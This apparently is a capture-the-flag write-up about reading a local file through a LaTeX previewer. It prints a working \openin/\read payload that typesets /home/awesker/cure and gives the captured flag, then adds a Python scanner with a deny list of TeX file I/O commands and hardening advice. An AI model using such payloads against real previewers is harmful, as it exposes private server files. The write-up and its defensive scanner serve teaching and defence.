Having very little experience with LaTeX, I googled around for a bit and stumbled on this paper: LaTeX Hacking
The paper describes how LaTeX previewers often make a system vulnerable because they are allowed to read and print local files, like so (note the \hfill to make the line wrap):
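% Open the file on input stream 5
\openin5=/home/awesker/cure
\def\readfile{%
\read5 to\curline % read the next line of the file into \curline
\ifeof5 \let\next=\relax % stop at end of file
\else \curline~\\ % typeset the line, then break
\let\next=\readfile % loop
\fi
\next}%
\ifeof5 Couldn't read the file!%
\else \hfill \readfile \closein5
\fi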
The font was fairly small, so I also included the following above the loop to make the flag readable:
\fontsize{20}{15}
\selectfont
Yay! The flag was embedded in the document now! Flag = gtttatgtagcttaccccctcaaagcaatacactgaaaatgtttcgacgggtttacatcaccccataaacaaacaggtttggtcctagcctttctattag
-- d1r3w0lf
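On the defending side, a previewer can refuse input like the snippet above before it ever reaches TeX. The following is an added example, not code from the post or the paper: a default-deny token check in Python, where the ALLOWED policy and the names scan, FILE_IO, TAKES_PATH and SAMPLE are assumptions made for illustration.

```python
import re

# Assumed policy for a restricted previewer: only these control words may appear.
ALLOWED = {"documentclass", "begin", "end", "section", "textbf", "emph",
           "frac", "sqrt", "hfill", "fontsize", "selectfont"}
# File read/write primitives, reported separately so they can be alerted on.
FILE_IO = {"openin", "read", "readline", "closein", "input", "include",
           "openout", "write", "closeout"}
TAKES_PATH = {"openin", "openout", "input", "include"}
# One pass: control word | control symbol (covers \% and \\) | comment | ^^ notation
TOKEN = re.compile(
    r"\\(?P<word>[A-Za-z@]+)|\\[\s\S]|(?P<comment>%[^\n]*)|(?P<caret>\^\^)")
# Optional stream number, '=', and brace, then the file name operand.
OPERAND = re.compile(r"\s*\d*\s*=?\s*\{?([^\s{}\\%]+)")

def scan(source):
    """Return (line, kind, detail) findings; an empty list means the input passes."""
    findings = []
    for m in TOKEN.finditer(source):
        line = source.count("\n", 0, m.start()) + 1
        if m.group("caret"):
            # ^^ notation can spell characters this tokenizer never sees: refuse it.
            findings.append((line, "not-allowed", "^^"))
        word = m.group("word")
        if word is None or word in ALLOWED:
            continue  # control symbols, comments and permitted macros
        if word in FILE_IO:
            detail = "\\" + word
            if word in TAKES_PATH:
                op = OPERAND.match(source, m.end())
                detail += " " + (op.group(1) if op else "?")
            findings.append((line, "file-io", detail))
        else:
            findings.append((line, "not-allowed", "\\" + word))  # default deny
    return findings

# Constructed sample: one benign line, then the first lines of the snippet above.
SAMPLE = r"""\section{Notes} 50\% done \\read % \openin5=/home/awesker/cure
\openin5=/home/awesker/cure
\read5 to\curline
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A filter like this is a triage and alerting layer. The control that actually stops the read is the engine's own file policy (kpathsea's openin_any = p in texmf.cnf), together with running the previewer in a sandbox that cannot see sensitive files.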